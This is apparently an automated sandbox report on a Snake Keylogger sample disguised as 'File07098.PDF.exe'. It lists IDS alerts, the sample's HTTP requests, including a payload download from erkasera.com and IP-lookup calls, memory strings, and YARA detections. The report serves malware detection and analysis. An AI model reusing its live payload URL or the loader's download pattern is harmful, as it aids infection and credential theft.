                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49750 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49765 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49785 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49804 -> 188.114.96.3:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49756 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /seuias/Mccudidikm.vdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /seuias/Mccudidikm.vdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: erkasera.com
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: InstallUtil.exe, 00000002.00000002.4484950182.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002534000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000262B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000261D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: InstallUtil.exe, 00000002.00000002.4484950182.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002534000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002521000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000262B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002577000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000261D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: InstallUtil.exe, 00000002.00000002.4484950182.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: InstallUtil.exe, 00000002.00000002.4484950182.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000254C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000262B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000261D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: File07098.PDF.exe, 00000000.00000002.2078600685.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: File07098.PDF.exe, 00000000.00000002.2078600685.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://erkasera.com
                Source: Current.exe, 00000005.00000002.2265233058.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://erkasera.com/seuias/Mccudidikm.vdfC
                Source: File07098.PDF.exe, 00000000.00000002.2078600685.00000000023D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://erkasera.com/seuias/Mccudidikm.vdfCpHB?
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: InstallUtil.exe, 00000002.00000002.4484950182.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002534000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000262B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002577000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000261D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002534000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: InstallUtil.exe, 00000006.00000002.4483465030.00000000025D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.78
                Source: InstallUtil.exe, 00000002.00000002.4484950182.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000262B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.0000000002577000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.000000000261D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000025D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.78$
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.0000000002476000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownHTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49724 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
